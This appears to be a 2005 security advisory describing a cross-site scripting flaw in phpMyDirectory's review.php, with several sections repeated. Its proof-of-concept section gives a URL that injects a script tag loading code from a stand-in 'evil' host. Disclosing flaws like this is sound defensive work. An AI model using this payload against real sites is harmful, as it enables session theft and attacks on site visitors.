PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability
BID:12900
Info
PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability
| Bugtraq ID: | 12900 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 25 2005 12:00AM |
| Updated: | Mar 25 2005 12:00AM |
| Credit: | Discovery is credited to mircia mircia <[email protected]>. |
| Vulnerable: |
phpMyDirectory phpMyDirectory 10.1.3 -rel |
| Not Vulnerable: | |
Discussion
PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability
phpMyDirectory is prone to a cross-site scripting vulnerability.
The problem presents itself when malicious HTML and script code is sent to the application through various parameters of the 'review.php' script.
This issue may allow for theft of cookie-based authentication credentials or other attacks.
phpMyDirectory 10.1.3-rel is reported vulnerable, however, it is possible that other versions are affected as well.
phpMyDirectory is prone to a cross-site scripting vulnerability.
The problem presents itself when malicious HTML and script code is sent to the application through various parameters of the 'review.php' script.
This issue may allow for theft of cookie-based authentication credentials or other attacks.
phpMyDirectory 10.1.3-rel is reported vulnerable, however, it is possible that other versions are affected as well.
Exploit / POC
PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability
An exploit is not required.
The following proof of concept example is available:
http://www.example.com/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>
An exploit is not required.
The following proof of concept example is available:
http://www.example.com/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>
Solution / Fix
PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability
References:
References:
- phpMyDirectory Homepage (phpMyDirectory)
- phpMyDirectory 10.1.3-rel Cross site scripting (mircia mircia